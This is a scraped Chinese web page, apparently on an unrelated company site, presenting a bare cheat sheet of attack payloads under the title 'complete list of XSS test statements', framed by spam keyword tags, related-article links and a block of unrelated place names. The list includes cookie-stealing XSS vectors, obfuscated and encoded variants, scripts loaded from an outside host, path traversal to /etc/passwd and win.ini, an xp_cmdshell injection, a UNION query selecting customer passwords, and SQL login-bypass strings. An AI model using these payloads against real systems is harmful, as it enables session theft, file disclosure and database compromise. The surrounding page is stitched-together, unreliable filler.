濮阳杆衣贸易有限公司

主頁 > 知識庫 > XSS測試語句大全

XSS測試語句大全

熱門標(biāo)簽:自動(dòng)外呼系統(tǒng)怎么防止封卡 鎮(zhèn)江云外呼系統(tǒng)怎么樣 vue 地圖標(biāo)注拖拽 電話機(jī)器人銷售公司嗎 客服外呼系統(tǒng)呼叫中心 成都銷售外呼系統(tǒng)公司 電話機(jī)器人案例 保定電銷機(jī)器人軟件 土地證宗地圖標(biāo)注符號
'>script>alert(document.cookie)/script>
='>script>alert(document.cookie)/script>
script>alert(document.cookie)/script>
script>alert(vulnerable)/script>
%3Cscript%3Ealert('XSS')%3C/script%3E
s#99;ript>alert('XSS')/script>
img src="javas#99;ript:alert('XSS')">
%0a%0ascript>alert(\"Vulnerable\")/script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
lt;scriptgt;alert('Vulnerable');lt;/scriptgt
script>alert('Vulnerable')/script>
?sql_debug=1
a%5c.aspx
a.jsp/script>alert('Vulnerable')/script>
a/
a?script>alert('Vulnerable')/script>
">script>alert('Vulnerable')/script>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E
%3Cscript%3Ealert(document.domain);%3C/script%3ESESSION_ID={SESSION_ID}SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"XSS>={()}
IMG SRC="javascript:alert('XSS');">
IMG SRC=javascript:alert('XSS')>
IMG SRC=JaVaScRiPt:alert('XSS')>
IMG SRC=JaVaScRiPt:alert(quot;XSSquot;)>
IMG SRC=#106;#97;#118;#97;#115;#99;#114;#105;#112;#116;#58;#97;#108;#101;#114;#116;#40;#39;#88;#83;#83;#39;#41>
IMG SRC=#0000106#0000097#0000118#0000097#0000115#0000099#0000114#0000105#0000112#0000116#0000058#0000097#0000108#0000101#0000114#0000116#0000040#0000039#0000088#0000083#0000083#0000039#0000041>
IMG SRC=#x6A#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3A#x61#x6C#x65#x72#x74#x28#x27#x58#x53#x53#x27#x29>
IMG SRC="jav#x09;ascript:alert('XSS');">
IMG SRC="jav#x0A;ascript:alert('XSS');">
IMG SRC="jav#x0D;ascript:alert('XSS');">
"IMG SRC=java\0script:alert(\"XSS\")>";' > out
IMG SRC=" javascript:alert('XSS');">
SCRIPT>a=/XSS/alert(a.source)/SCRIPT>
BODY BACKGROUND="javascript:alert('XSS')">
BODY ONLOAD=alert('XSS')>
IMG DYNSRC="javascript:alert('XSS')">
IMG LOWSRC="javascript:alert('XSS')">
BGSOUND SRC="javascript:alert('XSS');">
br size="{alert('XSS')}">
LAYER SRC="http://xss.ha.ckers.org/a.js">/layer>
LINK REL="stylesheet" HREF="javascript:alert('XSS');">
IMG SRC='vbscript:msgbox("XSS")'>
IMG SRC="mocha:[code]">
IMG SRC="livescript:[code]">
META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
IFRAME SRC=javascript:alert('XSS')>/IFRAME>
FRAMESET>FRAME SRC=javascript:alert('XSS')>/FRAME>/FRAMESET>
TABLE BACKGROUND="javascript:alert('XSS')">
DIV STYLE="background-image: url(javascript:alert('XSS'))">
DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html#39;);">
DIV STYLE="width: expression(alert('XSS'));">
STYLE>@im\port'\ja\vasc\ript:alert("XSS")';/STYLE>
IMG STYLE='xss:expre\ssion(alert("XSS"))'>
STYLE TYPE="text/javascript">alert('XSS');/STYLE>
STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}/STYLE>A CLASS=XSS>/A>
STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}/STYLE>
BASE HREF="javascript:alert('XSS');//">
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
XML SRC="javascript:alert('XSS');">
"> BODY ONLOAD="a();">SCRIPT>function a(){alert('XSS');}/SCRIPT>"
SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg">/SCRIPT>
IMG SRC="javascript:alert('XSS')"
!--#exec cmd="/bin/echo 'SCRIPT SRC'"-->!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js>/SCRIPT>'"-->
IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
SCRIPT a=">" '' SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
SCRIPT "a='>'" SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
SCRIPT>document.write("SCRI");/SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js">/SCRIPT>
A HREF=http://www.gohttp://www.google.com/ogle.com/>link/A>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
您可能感興趣的文章:
  • Python自動(dòng)化測試工具Splinter簡介和使用實(shí)例
  • python單元測試unittest實(shí)例詳解
  • python自動(dòng)化測試實(shí)例解析
  • python 測試實(shí)現(xiàn)方法
  • 詳解Python的單元測試
  • 整理php防注入和XSS攻擊通用過濾
  • 跨站式腳本(Cross-SiteScripting)XSS攻擊原理分析
  • 防止xss和sql注入:JS特殊字符過濾正則
  • XSS SQL注入
  • 基于Python的XSS測試工具XSStrike使用方法

標(biāo)簽:公主嶺 重慶 懷化 內(nèi)江 臺灣 天津 麗江 成都

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《XSS測試語句大全》,本文關(guān)鍵詞  XSS,測試,語句,大全,XSS,測試,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問題,煩請?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《XSS測試語句大全》相關(guān)的同類信息!
  • 本頁收集關(guān)于XSS測試語句大全的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    东丰县| 富裕县| 伊吾县| 将乐县| 永安市| 宣武区| 左贡县| 常熟市| 长子县| 遵义市| 昌图县| 日照市| 曲松县| 湖口县| 罗田县| 疏勒县| 福清市| 柳州市| 甘谷县| 额敏县| 贡山| 白银市| 定边县| 迭部县| 德钦县| 安陆市| 广德县| 油尖旺区| 孝义市| 酉阳| 潜江市| 延吉市| 奇台县| 新乡市| 米林县| 珲春市| 廉江市| 科尔| 阳原县| 米泉市| 炉霍县|